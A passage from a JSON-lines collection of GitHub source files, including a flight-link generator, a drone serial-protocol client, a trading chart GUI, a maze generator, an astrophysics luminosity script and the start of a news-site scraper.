getopt.getopt(argv,\"ha:b:y:z:d:r:e:n:\",[\"month-departure=\",\"month-return=\",\"year-departure=\",\"year-return=\",\"airport-departure=\",\"airport-return=\",\"extension=\",\"name=\"])\n except getopt.GetoptError:\n print('Options: \\n '\n '-e \\n'\n '-a \\n'\n '-y \\n'\n '-b \\n'\n '-z \\n'\n '-d \\n'\n '-r \\n\\n'\n ' i.e: vuelos.py '\n '-a 03 -y 2018 -b 04 -z 2018 -d FCO -r BKK,KUL (-m2 00 for no return)')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('Options: \\n '\n '-e \\n'\n '-a \\n'\n '-y \\n'\n '-b \\n'\n '-z \\n'\n '-d \\n'\n '-r \\n\\n'\n ' i.e: vuelos.py '\n '-a 03 -y 2018 -b 04 -z 2018 -d FCO -r BKK,KUL (-m2 00 for no return)')\n sys.exit()\n elif opt in (\"-a\", \"--month-departure\"):\n month_departure = arg\n elif opt in (\"-b\", \"--month-return\"):\n month_return = arg\n elif opt in (\"-y\", \"--year-departure\"):\n year_departure = arg\n elif opt in (\"-z\", \"--year-return\"):\n year_return = arg\n elif opt in (\"-d\", \"--airport-departure\"):\n airport_departure = arg\n elif opt in (\"-r\", \"--airport-return\"):\n airport_arrival = arg\n elif opt in (\"-e\", \"--extension\"):\n extension = arg\n elif opt in (\"-n\", \"--name\"):\n name = arg\n\n\n dates = gen_dates(month_departure, month_return, year_departure, year_return)\n links = gen_links(dates, airport_departure, airport_arrival, extensions=extension.split(\",\"))\n export_list_csv(links, name)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"xsergiolpx/Flights-Scraper","sub_path":"generate_links_kayak.py","file_name":"generate_links_kayak.py","file_ext":"py","file_size_in_byte":7777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26773315610","text":"import sys\nsys.path.insert(0, '.')\nfrom impl import trampoline # pylint: disable=relative-import,g-import-not-at-top\n\n\nTRAMPOLINE = [\n 'python starboard/tools/testing/test_runner.py',\n '--platform_tests_only',\n '{platform_arg}',\n '{config_arg}',\n '{device_id_arg}',\n '{target_params_arg}',\n]\n\n\ndef _ResolveTrampoline(argv=None):\n if argv == None:\n argv = sys.argv[1:]\n resolved_cmd, unresolve_args = trampoline.ResolveTrampoline(\n TRAMPOLINE, argv=argv)\n return resolved_cmd\n\n\nif __name__ == '__main__':\n trampoline.RunThenExit(_ResolveTrampoline())\n","repo_name":"blockspacer/cobalt-clone-cab7770533804d582eaa66c713a1582f361182d3","sub_path":"src/cobalt/build/cobalt_archive_content/__cobalt_archive/run/run_platform_tests.py","file_name":"run_platform_tests.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"39704896061","text":"\"\"\"\nWidgets for plotting multi-channel signals.\n\"\"\"\n\nimport pyqtgraph\n\n\nclass SignalWidget(pyqtgraph.GraphicsLayoutWidget):\n \"\"\"\n Scrolling oscilloscope-like widget for displaying real-time signals.\n\n Intended for multi-channel viewing, each channel gets its own row in the\n widget, and all channels share y-axis zoom.\n \"\"\"\n\n def __init__(self):\n super(SignalWidget, self).__init__()\n\n self.plot_items = []\n self.plot_data_items = []\n\n self.n_channels = 0\n\n self.setBackground(None)\n\n def plot(self, data):\n \"\"\"\n Adds a window of data to the widget.\n\n Previous windows are scrolled to the left, and the new data is added to\n the end.\n\n Parameters\n ----------\n data : ndarray, shape = (n_channels, n_samples)\n Window of data to add to the end of the currently-shown data.\n \"\"\"\n nch, nsamp = data.shape\n if nch != self.n_channels:\n self.n_channels = nch\n self._update_num_channels()\n\n for i, pdi in enumerate(self.plot_data_items):\n pdi.setData(data[i])\n\n def _update_num_channels(self):\n self.clear()\n\n self.plot_items = []\n self.plot_data_items = []\n pen = _MultiPen(self.n_channels)\n for i in range(self.n_channels):\n plot_item = self.addPlot(row=i, col=0)\n plot_data_item = plot_item.plot(pen=pen.get_pen(i), antialias=True)\n\n plot_item.showAxis('bottom', False)\n plot_item.showGrid(y=True, alpha=0.5)\n plot_item.setMouseEnabled(x=False)\n plot_item.setMenuEnabled(False)\n\n if self.n_channels > 1:\n label = \"ch {}\".format(i)\n plot_item.setLabels(left=label)\n\n if i > 0:\n plot_item.setYLink(self.plot_items[0])\n\n self.plot_items.append(plot_item)\n self.plot_data_items.append(plot_data_item)\n\n self.plot_items[0].disableAutoRange(pyqtgraph.ViewBox.YAxis)\n self.plot_items[0].setYRange(-1, 1)\n\n\nclass _MultiPen(object):\n\n MIN_HUE = 160\n HUE_INC = 20\n VAL = 200\n\n def __init__(self, n_colors):\n self.n_colors = n_colors\n self.max_hue = self.MIN_HUE + n_colors*self.HUE_INC\n\n def get_pen(self, index):\n return pyqtgraph.intColor(\n index, hues=self.n_colors,\n minHue=self.MIN_HUE, maxHue=self.max_hue,\n minValue=self.VAL, maxValue=self.VAL)\n","repo_name":"axopy/axopy","sub_path":"axopy/gui/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"48"} +{"seq_id":"30365342556","text":"\"\"\"\nFizzBuzz is the following problem:\n\nFor each of the numbers 1 to 100:\n* if the number is divisible by 3, print \"fizz\"\n* if the number is divisible by 5, print \"buzz\"\n* if the number is divisible by 15, print \"fizzbuzz\"\n* otherwise, just print the number\n\"\"\"\nfrom typing import List\n\nimport numpy as np\n\nfrom joelnet.train import train\nfrom joelnet.nn import NeuralNet\nfrom joelnet.layers import Linear, Tanh\nfrom joelnet.optim import SGD\n\ndef fizz_buzz_encode(x: int) -> List[int]:\n if x % 15 == 0:\n return [0, 0, 0, 1]\n elif x % 5 == 0:\n return [0, 0, 1, 0]\n elif x % 3 == 0:\n return [0, 1, 0, 0]\n else:\n return [1, 0, 0, 0]\n\n\ndef binary_encode(x: int) -> List[int]:\n \"\"\"\n 10 digit binary encoding of x\n \"\"\"\n return [x >> i & 1 for i in range(10)]\n\ninputs = np.array([\n binary_encode(x)\n for x in range(101, 1024)\n])\n\ntargets = np.array([\n fizz_buzz_encode(x)\n for x in range(101, 1024)\n])\n\nnet = NeuralNet([\n Linear(input_size=10, output_size=50),\n Tanh(),\n Linear(input_size=50, output_size=4)\n])\n\ntrain(net,\n inputs,\n targets,\n num_epochs=5000,\n optimizer=SGD(lr=0.001))\n\nfor x in range(1, 101):\n predicted = net.forward(binary_encode(x))\n predicted_idx = np.argmax(predicted)\n actual_idx = np.argmax(fizz_buzz_encode(x))\n labels = [str(x), \"fizz\", \"buzz\", \"fizzbuzz\"]\n print(x, labels[predicted_idx], labels[actual_idx])\n","repo_name":"joelgrus/joelnet","sub_path":"fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":316,"dataset":"github-code","pt":"48"} +{"seq_id":"41543790885","text":"import construct\r\nfrom construct import *\r\nimport serial\r\nimport time\r\nimport structs\r\nimport sys, os\r\n\r\nclass msp:\r\n\r\n def __init__(self, serPort):\r\n\r\n self.ser = serial.Serial()\r\n self.ser.port = serPort\r\n self.ser.baudrate = 115200\r\n self.ser.bytesize = serial.EIGHTBITS\r\n self.ser.parity = serial.PARITY_NONE\r\n self.ser.stopbits = serial.STOPBITS_ONE\r\n self.ser.timeout = 0\r\n self.ser.xonxoff = False\r\n self.ser.rtscts = False\r\n self.ser.dsrdtr = False\r\n self.ser.writeTimeout = 2\r\n \"\"\"Time to wait until the board becomes operational\"\"\"\r\n wakeup = 2\r\n try:\r\n self.ser.open()\r\n for i in range(1, wakeup):\r\n time.sleep(1)\r\n except Exception as error:\r\n print(\"\\n\\nError opening \" + self.ser.port + \" port.\\n\" + str(error) + \"\\n\\n\")\r\n\r\n def sendCMDreceive(self, function, data, plformat):\r\n format = structs.Message.struct\r\n checksumformat= structs.Message.checksumFormat\r\n if data==[]:\r\n payload=data\r\n data_length=0\r\n else:\r\n payload=plformat.build(data)\r\n payload=bytearray(bytes(payload))\r\n data_length=len(bytearray(bytes(payload)))\r\n \r\n \r\n parameters = checksumformat.build(dict(function=function, payloadSize=data_length, payload=payload))\r\n checksum=0\r\n for i in bytearray(bytes(parameters)):\r\n checksum = checkSum(checksum, i)\r\n bytes2 = format.build(dict(function=function, payloadSize=data_length, payload=payload, checksum=checksum))\r\n try:\r\n b = self.ser.write(bytes2)\r\n while True:\r\n header = self.ser.read()\r\n if header != b\"\":\r\n blist = header\r\n if header == b'$':\r\n while header != b\"\":\r\n header = self.ser.read()\r\n blist = blist + header\r\n break\r\n format = structs.Message.structRecv\r\n if ((function==106 and len(blist)!=27) or (function==108 and len(blist)!=15) or (function==109 and len(blist)!=19) or (function==106 and len(blist)!=27)):\r\n return None\r\n if function==209:\r\n #print(\"lala \",blist)\r\n return blist\r\n #print(blist)\r\n #print(len(blist),function)\r\n parsed_data = dict(format.parse(blist))\r\n blist = parsed_data[\"payload\"]\r\n payload1=construct.Array(parsed_data[\"payloadSize\"], Int8ub).build(blist)\r\n\r\n parsed_data = dict(plformat.parse(payload1))\r\n #print(\"end\")\r\n #print(parsed_data)\r\n return parsed_data\r\n\r\n except Exception as error:\r\n print(\"\\n\\nError in sendCMDreceive.\")\r\n exc_type, exc_obj, exc_tb = sys.exc_info()\r\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\r\n print(error,exc_type, fname, exc_tb.tb_lineno)\r\n sys.exc_clear()\r\n return None\r\n\r\ndef getCheckSum(bytes):\r\n for i in bytes:\r\n checksum = checkSum(checksum, i)\r\n return checksum\r\n\r\n\r\ndef checkSum(crc, a):\r\n crc ^= a\r\n for i in range(0, 8):\r\n\r\n if crc & 0x80:\r\n crc = ((crc & 127) << 1) ^ 0xD5\r\n else:\r\n crc = (crc & 127) << 1\r\n return crc\r\n\r\n\r\n","repo_name":"dimitri-silva/PiDrone","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25471347539","text":"from PySide6.QtWidgets import QMainWindow, QLabel\nfrom PySide6.QtCore import QSize\nfrom MPLQTCanvas import MPLQTCanvas\nfrom TradingState import TradingState\nfrom ui.MainFormUI import Ui_MainForm\n\n\ndef ticks_history_recalc_ticks_next_day_notify(main_form, new_date):\n main_form.set_statusbar_text(\"Calculating ticks {:02d}.{:02d}.{:4d}...\".format(new_date.day, new_date.month, new_date.year))\n\n\ndef ticks_history_recalc_ticks_percents_next_day_notify(main_form, new_date):\n main_form.set_statusbar_text(\"Calculating ticks percents {:02d}.{:02d}.{:4d}...\".format(new_date.day, new_date.month, new_date.year))\n\n\ndef ticks_history_recalc_ticks_points_next_day_notify(main_form, new_date):\n main_form.set_statusbar_text(\"Calculating ticks points {:02d}.{:02d}.{:4d}...\".format(new_date.day, new_date.month, new_date.year))\n\n\ndef ticks_history_recalc_zigzag_next_day_notify(main_form, new_date):\n main_form.set_statusbar_text(\"Calculating ZigZag {:02d}.{:02d}.{:4d}...\".format(new_date.day, new_date.month, new_date.year))\n\n\ndef ticks_history_recalc_ema_next_day_notify(main_form, new_date):\n main_form.set_statusbar_text(\"Calculating EMA {:02d}.{:02d}.{:4d}...\".format(new_date.day, new_date.month, new_date.year))\n\n\nclass MainForm(QMainWindow):\n def __init__(self, application=None):\n super().__init__()\n\n self._application = application\n self._page_scroll_amount = 500\n\n self.ui = Ui_MainForm()\n self.ui.setupUi(self)\n\n #region Status bar initialization\n self.ui.statusbarText = QLabel()\n self.ui.statusbar.addPermanentWidget(self.ui.statusbarText, stretch=100)\n #endregion Status bar initialization\n\n #region Connect actions\n self.ui.actionExit.triggered.connect(self.execute_exit_action)\n self.ui.actionRecalculate_ticks.triggered.connect(self.execute_Recalculate_ticks_action)\n self.ui.actionRecalculate_ticks_percents.triggered.connect(self.execute_Recalculate_ticks_percents_action)\n self.ui.actionRecalculate_ticks_points.triggered.connect(self.execute_Recalculate_ticks_points_action)\n self.ui.actionRecalculate_zigzag.triggered.connect(self.execute_Recalculate_zigzag_action)\n self.ui.actionRecalculate_EMA.triggered.connect(self.execute_Recalculate_EMA_action)\n\n self.ui.PageUpButton.clicked.connect(self.PageUpButton_click)\n self.ui.PageDnButton.clicked.connect(self.PageDnButton_click)\n #endregion Connect actions\n\n #region Charts canvases initialization\n self.ui.ticks_frame_prices_chart_canvas = MPLQTCanvas()\n self.ui.ticks_frame_chart_layout.addWidget(self.ui.ticks_frame_prices_chart_canvas)\n\n self.ui.ticks_frame_bid_ask_percents_canvas = MPLQTCanvas()\n self.ui.ticks_frame_bid_ask_percents_canvas.setMaximumSize(QSize(16777215, 100))\n self.ui.ticks_frame_bid_ask_percents_canvas.setVisible(False)\n self.ui.ticks_frame_chart_layout.addWidget(self.ui.ticks_frame_bid_ask_percents_canvas)\n\n self.ui.ticks_frame_bid_ask_percents_neuroinputs = MPLQTCanvas()\n self.ui.ticks_frame_bid_ask_percents_neuroinputs.setMaximumSize(QSize(16777215, 100))\n self.ui.ticks_frame_bid_ask_percents_neuroinputs.setVisible(False)\n self.ui.ticks_frame_chart_layout.addWidget(self.ui.ticks_frame_bid_ask_percents_neuroinputs)\n\n self.ui.ticks_frame_bid_ask_points_canvas = MPLQTCanvas()\n self.ui.ticks_frame_bid_ask_points_canvas.setMaximumSize(QSize(16777215, 100))\n self.ui.ticks_frame_chart_layout.addWidget(self.ui.ticks_frame_bid_ask_points_canvas)\n\n self.ui.ticks_frame_bid_ask_points_neuroinputs = MPLQTCanvas()\n self.ui.ticks_frame_bid_ask_points_neuroinputs.setMaximumSize(QSize(16777215, 100))\n self.ui.ticks_frame_chart_layout.addWidget(self.ui.ticks_frame_bid_ask_points_neuroinputs)\n #endregion Charts canvases initialization\n\n #region Trading state initialization\n self.trading_state = TradingState(owner_form=self, symbol=\"EURUSDrfd\", ticks_history_folder=\"history\\AlfaForex\\EURUSDrfd\")\n self.trading_state.load_zigzag(filename_postfix=\"100\")\n self.trading_state.go_to_start()\n #TODO: Provide for a situation when the ticks in the day are smaller than the frame size\n self.trading_state.tick_index = self.trading_state.ticks_frame_size\n #endregion Trading state initialization\n\n self.update_canvases()\n\n def set_statusbar_text(self, text):\n self.ui.statusbarText.setText(text)\n self.ui.statusbarText.repaint()\n if self._application is not None:\n self._application.processEvents()\n\n def clear_status_bar(self):\n self.set_statusbar_text(\"\")\n\n def update_ticks_frame_prices_chart_canvas(self):\n canvas = self.ui.ticks_frame_prices_chart_canvas\n figure = canvas.figure\n axes = figure.gca()\n self.trading_state.plot_ticks_bid_ask_prices(axes=axes, labels_and_grid=True)\n canvas.draw()\n\n def update_ticks_frame_percents_chart_canvas(self):\n canvas = self.ui.ticks_frame_bid_ask_percents_canvas\n self.trading_state.plot_ticks_bid_ask_percents(axes=canvas.figure.gca(), labels_and_grid=True)\n canvas.draw()\n\n def update_ticks_frame_points_chart_canvas(self):\n canvas = self.ui.ticks_frame_bid_ask_points_canvas\n self.trading_state.plot_ticks_bid_ask_points(axes=canvas.figure.gca(), labels_and_grid=True)\n canvas.draw()\n\n def update_ticks_frame_bid_ask_percents_neuroinputs_chart_canvas(self):\n canvas = self.ui.ticks_frame_bid_ask_percents_neuroinputs\n self.trading_state.plot_ticks_bid_ask_percents_neuroinputs(axes=canvas.figure.gca(), labels_and_grid=True)\n canvas.draw()\n\n def update_ticks_frame_bid_ask_points_neuroinputs_chart_canvas(self):\n canvas = self.ui.ticks_frame_bid_ask_points_neuroinputs\n self.trading_state.plot_ticks_bid_ask_points_neuroinputs(axes=canvas.figure.gca(), labels_and_grid=True)\n canvas.draw()\n\n def update_canvases(self):\n self.update_ticks_frame_prices_chart_canvas()\n\n self.update_ticks_frame_percents_chart_canvas()\n self.update_ticks_frame_bid_ask_percents_neuroinputs_chart_canvas()\n\n self.update_ticks_frame_points_chart_canvas()\n self.update_ticks_frame_bid_ask_points_neuroinputs_chart_canvas()\n\n def ticks_frame_pageup(self):\n self.trading_state.jump_forward(self._page_scroll_amount)\n\n def ticks_frame_pagedn(self):\n self.trading_state.jump_backward(self._page_scroll_amount)\n\n def PageUpButton_click(self):\n self.ticks_frame_pageup()\n self.update_canvases()\n\n def PageDnButton_click(self):\n self.ticks_frame_pagedn()\n self.update_canvases()\n\n def execute_exit_action(self):\n self.close()\n\n def execute_Recalculate_ticks_action(self):\n if self.trading_state._ticks_history.data_files_format() != \".csv\":\n print(\"Ticks history data files format is allready pkl\")\n return\n self.trading_state.next_day_notification = ticks_history_recalc_ticks_next_day_notify\n self.trading_state.recalc_ticks()\n self.clear_status_bar()\n\n def execute_Recalculate_ticks_percents_action(self):\n self.trading_state.next_day_notification = ticks_history_recalc_ticks_percents_next_day_notify\n self.trading_state.recalc_ticks_percents()\n self.clear_status_bar()\n\n def execute_Recalculate_ticks_points_action(self):\n self.trading_state.next_day_notification = ticks_history_recalc_ticks_points_next_day_notify\n self.trading_state.recalc_ticks_points()\n self.clear_status_bar()\n\n def execute_Recalculate_zigzag_action(self):\n self.trading_state.next_day_notification = ticks_history_recalc_zigzag_next_day_notify\n #TODO: Replace hardcode params in MainForm.execute_Recalculate_zigzag_action()\n self.trading_state.recalc_zigzag(100)\n self.update_ticks_frame_prices_chart_canvas()\n self.clear_status_bar()\n\n def execute_Recalculate_EMA_action(self):\n self.trading_state.next_day_notification = ticks_history_recalc_ema_next_day_notify\n self.trading_state.recalc_ema()\n self.update_ticks_frame_prices_chart_canvas()\n self.clear_status_bar()\n","repo_name":"Alchemist221276/RLTrader","sub_path":"MainForm.py","file_name":"MainForm.py","file_ext":"py","file_size_in_byte":8335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6935733074","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom modules import *\n\nclass MLP(object):\n\n def __init__(self, n_inputs, n_hidden, n_classes):\n \"\"\"\n Initializes multi-layer perceptron object. \n Args:\n n_inputs: number of inputs (i.e., dimension of an input vector).\n n_hidden: list of integers, where each integer is the number of units in each linear layer\n n_classes: number of classes of the classification problem (i.e., output dimension of the network)\n \"\"\"\n self.layers = []\n for i in range(len(n_hidden)):\n if i == 0:\n self.layers.append([Linear(n_inputs,n_hidden[0]),ReLU()])\n else:\n self.layers.append([Linear(n_hidden[i-1],n_hidden[i]),ReLU()])\n self.output_layer = [Linear(n_hidden[len(n_hidden)-1],n_classes),SoftMax()]\n\n def forward(self, x):\n \"\"\"\n Predict network output from input by passing it through several layers.\n Args:\n x: input to the network\n Returns:\n out: output of the network\n \"\"\"\n for layer in self.layers:\n x = layer[0].forward(x)\n x = layer[1].forward(x)\n x = self.output_layer[0].forward(x)\n out = self.output_layer[1].forward(x)\n return out\n\n def backward(self, dout):\n \"\"\"\n Performs backward propagation pass given the loss gradients. \n Args:\n dout: gradients of the loss\n \"\"\"\n dou = self.output_layer[1].backward(dout)\n dou = self.output_layer[0].backward(dou)\n for i in range(len(self.layers)):\n dou = self.layers[-i-1][1].backward(dou)\n dou = self.layers[-i-1][0].backward(dou)\n return\n","repo_name":"CindyChow123/DeepLearning_2021_spring","sub_path":"Assignment_1_perceptron/mlp_numpy.py","file_name":"mlp_numpy.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5006424662","text":"import random\n\n# Calculate the wavelength of a sound wave whose frequency is f hz and speed is v m/s in a given medium. \n# Calculate the frequency of a sound wave whose wavelength is lamb m and speed is v m/s in a given medium. \n# Calculate the speed of a sound wave whose frequency is f hz and wavelength is lamb m in a given medium. \n\nqns = open('./questions.txt', 'w') \nans = open('./answers.txt','w')\nno_of_samples = 2000000\n# no_of_samples = 8\n\ndef calculation_lamb(f, v): \n return v // f\n\ndef calculation_f(lamb, v):\n return v // lamb\n\ndef calculation_v(f , lamb):\n return f*lamb\n\ndef type1():\n f = random.randint(1,1000)\n v = (random.randint(1,1000))*f\n lamb = str(calculation_lamb(f,v)) + \" m\\n\"\n q = \"Calculate the wavelength of a sound wave whose frequency is \"+str(f)+\" hz and speed is \"+str(v)+\" m/s in a given medium ?\\n\"\n return q,lamb\n\ndef type2():\n lamb = random.randint(1,1000)\n v = (random.randint(1,1000))*lamb\n f = str(calculation_f(lamb,v)) + \" hz\\n\"\n q = \"Calculate the frequency of a sound wave whose wavelength is \"+str(lamb)+\" m and speed is \"+str(v)+\" m/s in a given medium ?\\n\"\n return q,f\n\ndef type3():\n f = random.randint(1,2000)\n lamb = random.randint(1,1000)\n v = str(calculation_v(f,lamb)) + \" m/s\\n\"\n q = \"Calculate the speed of a sound wave whose frequency is \"+str(f)+\" hz and wavelength is \"+str(lamb)+\" m in a given medium ?\\n\"\n return q,v\n\nfor i in range(no_of_samples):\n types = random.randint(0,3)\n if types == 0:\n ques,answer = type1()\n if types == 1:\n ques,answer = type2()\n if types == 2 or types == 3:\n ques,answer = type3()\n qns.write(ques)\n ans.write(answer)\n # print(ques)\n # print(answer)\n \nqns.close()\nans.close()\n","repo_name":"misterpawan/scimat2","sub_path":"science/Sound/v_nu_lamb/v_nu_lamb.py","file_name":"v_nu_lamb.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"14332253847","text":"#Amazing Mazes\n# Recursive Backtrack\nfrom maze_classes import *\n\ndef build_recursive(maze):\n\n path = []\n cell = maze.maze_cells[0][0]\n path.append(cell.ID())\n cell.Visit()\n\n cells_nb = maze.N * maze.N\n\n while len(path) < cells_nb:\n prev_X = cell.X\n prev_Y = cell.Y\n cell = next(cell)\n \n if cell == 'END':\n i = -1\n while maze.maze_cells[path[i][0]][path[i][1]].available_dir() == []:\n i = i - 1\n \n prev_X = path[i][0]\n prev_Y = path[i][1]\n cell = next(maze.maze_cells[path[i][0]][path[i][1]])\n \n if cell.X == prev_X:\n if cell.Y > prev_Y:\n dir = 'W'\n else:\n dir = 'E'\n\n elif cell.Y == prev_Y:\n if cell.X > prev_X:\n dir = 'N'\n else:\n dir = 'S'\n\n path.append(cell.ID())\n cell.Visit()\n cell.break_wall(dir)\n \n return maze\n\ndef next(cell):\n\n next_list = cell.available_dir()\n if next_list != []:\n dir = random.choice(next_list)\n\n if dir == 'N' and cell.X > 0:\n return cell.maze.maze_cells[cell.X-1][cell.Y]\n\n elif dir == 'E' and cell.Y < cell.maze.N - 1:\n return cell.maze.maze_cells[cell.X][cell.Y+1]\n\n elif dir == 'S' and cell.X < cell.maze.N - 1:\n return cell.maze.maze_cells[cell.X+1][cell.Y]\n\n elif dir == 'W' and cell.Y > 0:\n return cell.maze.maze_cells[cell.X][cell.Y-1]\n\n else:\n next(cell)\n\n else:\n return 'END'","repo_name":"hamdain-mazen/amazing-mazes","sub_path":"generator_RBT.py","file_name":"generator_RBT.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1602071095","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 7 17:55:24 2023\n\n@author: konstantinos\n\"\"\"\nfrom src.Utilities.isalice import isalice\nalice, plot = isalice()\n\nimport sys\nsys.path.append('/Users/paolamartire/tde_comparison')\n\nimport numpy as np\nimport numba\nfrom src.Opacity.opacity_table import opacity\nfrom src.Calculators.raymaker_tube import ray_maker\nfrom src.Luminosity.special_radii_tube import get_photosphere\n\n# Setup\nif alice:\n fixes = np.arange(845, 1005, step = 10)\n prunes = [1] * len(fixes)\nelse:\n fixes = [844, 881, 925, 950]\n prunes = [1, 4, 10, 20]\n \nm = 6\n# Constants\nc_cgs = 3e10 # [cm/s]\nRsol_to_cm = 6.957e10 # [cm]\npre = '/home/s3745597/data1/TDE/'\n#%%\n@numba.njit\ndef grad_calculator(ray: np.array, radii: np.array, r_photo): \n # For a single ray (in logspace) get \n # the index of radius closest to sphere_radius and the gradE there.\n # Everything is in CGS.\n for i, radius in enumerate(radii):\n if radius > r_photo:\n idx = i - 1 \n break\n \n # For rad\n if idx<0:\n print('Bad Observer, photosphere is the closest point')\n idx=0\n \n step = radii[idx+1] - radii[idx]\n grad_E = (ray[idx+1] - ray[idx]) / step \n\n return grad_E, idx\n\n \ndef flux_calculator(grad_E, idx, \n single_Rad, single_T, single_Den):\n \"\"\"\n Get the flux for every observer.\n Eevrything is in CGS.\n\n Parameters: \n grad_E idx_tot are 1D-array of lenght = len(rays)\n rays, rays_T, rays_den are len(rays) x N_cells arrays\n \"\"\"\n # We compute stuff OUTSIDE the photosphere\n # (which is at index idx_tot[i])\n idx = idx+1 # \n Energy = single_Rad[idx]\n max_travel = np.sign(-grad_E) * c_cgs * Energy # or should we keep the abs???\n \n Temperature = single_T[idx]\n Density = single_Den[idx]\n \n # Ensure we can interpolate\n rho_low = np.exp(-45)\n T_low = np.exp(8.77)\n T_high = np.exp(17.8)\n \n # If here is nothing, light continues\n if Density < rho_low:\n return max_travel\n \n # If stream, no light \n if Temperature < T_low: \n return 0\n \n # T too high => Kramers'law\n if Temperature > T_high:\n X = 0.7389\n k_ross = 3.68 * 1e22 * (1 + X) * Temperature**(-3.5) * Density #Kramers' opacity [cm^2/g]\n k_ross *= Density\n else: \n # Get Opacity, NOTE: Breaks Numba\n k_ross = opacity(Temperature, Density, 'rosseland', ln = False)\n \n # Calc R, eq. 28\n R = np.abs(grad_E) / (k_ross * Energy)\n invR = 1 / R\n # Calc lambda, eq. 27\n coth = 1 / np.tanh(R)\n lamda = invR * (coth - invR)\n # Calc Flux, eq. 26\n Flux = - c_cgs * grad_E * lamda / k_ross\n \n # Take the minimum between F, cE\n if Flux > max_travel:\n return max_travel\n else:\n return Flux\n\ndef red(fixes, m, prunes):\n\n bols = []\n photos = []\n for d, fix in enumerate(fixes):\n rays_T, rays_Den, rays_Rad, rays_R = ray_maker(fix, m, prunes[d])\n cumul_kappa, photo = get_photosphere(rays_T, rays_Den, rays_R)\n fluxes = []\n for i in range(len(rays_T)):\n \n # Isolate ray\n single_T = rays_T[i]\n single_Den = rays_Den[i]\n single_Rad = rays_Rad[i]\n single_radii = rays_R[i]\n \n # Calculate gradE\n grad_E, idx = grad_calculator(single_Rad, single_radii, photo[i])\n \n # Calculate Flux \n flux = flux_calculator(grad_E, idx, \n single_Rad, single_T, single_Den)\n fluxes.append(flux) # Keep it\n \n # Convert to luminosity \n lum = np.zeros(len(fluxes))\n for i in range(len(fluxes)):\n # Ignore negative flux\n if fluxes[i] < 0:\n continue\n # Convert photo to cm\n r = photo[i] * Rsol_to_cm\n lum[i] = fluxes[i] * 4 * np.pi * r**2\n \n # Average in observers\n bol_lum = np.sum(lum)/192\n print('L FLD: %.2e' % bol_lum)\n # Hold\n bols.append(bol_lum)\n photos.append(photo)\n \n if alice:\n np.savetxt(pre + 'data/red_tube_alice', bols)\n np.savetxt(pre + 'data/photosphere_alice', photos)\n else:\n np.savetxt('data/red_tube',bols)\n np.savetxt('data/photosphere', photos)\n \n # if not alice:\n # from src.Utilities.finished import finished\n # finished()\n \n return bols, photos\n#%% Main\n\nbols, photos = red(fixes, m, prunes)\n#%% Plot & Print\n\nif plot and not alice:\n import matplotlib.pyplot as plt\n plt.rcParams['text.usetex'] = True\n plt.rcParams['figure.dpi'] = 300\n plt.rcParams['font.family'] = 'Times New Roman'\n plt.rcParams['figure.figsize'] = [5 , 4]\n plt.rcParams['axes.facecolor']= \t'whitesmoke'\n plt.rcParams['xtick.direction'] = 'in'\n plt.rcParams['ytick.direction'] = 'in'\n AEK = '#F1C410' # Important color \n # Choose fix\n which = 0\n lum = bols[which]\n photo = photos[which]\n \n # Plot\n fig, ax = plt.subplots(1,2, figsize = (10, 6))\n ax[0].plot(lum, 'o', c ='k')\n \n # Make pretty\n ax[0].set_yscale('log')\n ax[0].set_title('FLD Luminosity')\n ax[0].set_xlabel('Observers')\n ax[0].set_ylabel('Luminosity [erg/s]')\n \n # Plot Photo\n ax[1].plot(photo, 'o', c = 'k')\n \n ## Make pretty\n # My lines\n from scipy.stats import gmean\n ax[1].axhline(np.mean(photo), linestyle = '--' ,c = 'seagreen')\n ax[1].axhline(gmean(photo), linestyle = '--', c = 'darkorange')\n #ax[1].text()\n # Elad's lines\n ax[1].axhline(40 , c = AEK)\n ax[1].axhline(700, c= 'lightseagreen')\n \n ax[1].set_yscale('log')\n ax[1].set_title('Photosphere')\n ax[1].set_ylabel(r'Photosphere Radius [$R_\\odot$]')\n ax[1].set_xlabel('Observers')\n plt.show()\n \n","repo_name":"KKilmetis8/tde_comparison","sub_path":"src/Luminosity/red_tube.py","file_name":"red_tube.py","file_ext":"py","file_size_in_byte":5911,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71648506386","text":"from getdata.items import GetdataItem\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\n\n\nclass MyJiao(CrawlSpider):\n name = \"jiaoyu\"\n allowed_domains = ['www.moe.gov.cn']\n start_urls = [\n 'http://www.moe.gov.cn/jyb_xwfb/gzdt_gzdt/'\n ]\n\n for i in range(1, 10):\n url = \"http://www.moe.gov.cn/jyb_xwfb/gzdt_gzdt/index_\" + str(i) + \".html\"\n start_urls.append(url)\n\n rules = [\n Rule(LinkExtractor(allow='/moe'), callback='parse_item'),\n Rule(LinkExtractor(allow='jyb_xwfb/gzdt_gzdt/s'), callback='parse_item')\n ]\n\n def parse_item(self, response):\n title = 